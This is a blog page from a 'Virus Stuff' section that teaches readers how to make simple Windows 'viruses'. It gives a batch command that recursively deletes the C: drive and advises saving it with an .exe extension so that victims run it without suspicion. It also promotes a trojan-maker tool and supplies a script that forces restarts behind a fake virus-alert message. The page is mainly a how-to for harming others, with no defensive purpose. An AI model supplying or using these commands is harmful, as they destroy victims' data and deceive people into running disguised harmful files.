Ads 468x60px

1

Infolinks In Text Ads

Infolinks InText

Sample text

Showing posts with label Virus Stuff. Show all posts
Showing posts with label Virus Stuff. Show all posts

Wednesday, 6 November 2013

How to Make a Deadly Virus To Crash Operating System




Warning: Never use it on your own computer. If Program accidentally get activated on your system, You can't repair it again. In this case you have to reinstall your window again.!!!!

Steps to create this program or virus. 
Step 1: Open NOTEPAD and type this command :- 
                      RD c:\ /s /q

Note: C:\ is the location where system files are located. You can change it.

Step 2: Now save as this file and give any name you want with extension .exe and save as file type (all files).

Note: Actually it's a batch file program. But most of the people runs .exe files without thinking anything.. So I am using .exe extension instead of .bat 

Create Virus Using JPS (Virus Maker)


This is a small but very useful software . With the help of this you can create any type of trojans and program it to do whatever you want.
This can be programmed to do the following things:


How to easily create virus to restart pc


Well, I know there are lots of techniques available to restart computer. But all the techniques  requires a basic knowledge of  programming. But in this technique you do not need to know whole programming language but you need just little programming  knowledge. You can also create a program to restart window automatically every start upusing c or c++ language.You can also programming in other languages and make virus to create a virus to restart program.
So remember friends, it is not a real virus and the main instance is not to make a virus but i want to teach you something in batch programming. so let's start.

What is batch programming?
Batch programming is the programming language offered by Microsoft windows operating system. Batch file can be created using any of text editors like word pad notepad etc.Thisprogramming language is deserves interpreter method means it executed line by line.
You can perform lots of operation using this programming language like deleting files of same type or diffrent types,clear unwanted computer craps,creating logs and also create batch virus like restart window every time when it start.

So first open notepad and paste there following code.

cd..
shutdown /t 30 /r /c "Your computer detects a virus"

Now save as it with .bat extension. and run the file and thats it.

You can see the message that " Your computer detects Virus" and the computer will be shut down in 30 seconds and restart again.
Here,
/t indicates time interval that can be changed.
/r indicates restart windows you can change it to /s to only shutdown windows.
/c indicates the message that you want to display. 

Blogger templates

Twitter Bird Gadget